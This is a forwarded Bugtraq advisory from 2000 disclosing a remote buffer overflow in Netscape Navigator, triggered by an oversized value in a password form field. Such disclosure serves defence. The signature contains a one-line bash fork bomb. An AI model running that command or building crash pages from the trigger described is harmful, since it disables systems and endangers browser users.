----- Forwarded message from Michal Zalewski ----- Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: BUGTRAQ@SECURITYFOCUS.COM X-Hate: Where do you want to go to die? Date: Thu, 28 Sep 2000 18:45:41 +0200 Reply-To: Michal Zalewski From: Michal Zalewski Subject: Netscape Navigator buffer overflow To: BUGTRAQ@SECURITYFOCUS.COM Haven't seen bugreport on it, so I decided to publish this vulnerability. In fact it's pretty old, but still unpublished: Netscape Navigator is vulnerable to trivial, remote buffer overflow attack when viewing prepared html:
...other form tags...
If buffer is reasonably long, Netscape crashes with SEGV while trying to parse this tag (it happens around 16 kB of junk as value=) while calling function XFE_GetFormElementInfo(). It is not a stack overflow, but, as some pointers are overwritten, it seems to be exploitable. If someone has free time and good will, could try - recall JPEG comment heap overflow. Only type=password is vulnerable to this attack. _______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----= ----- End forwarded message -----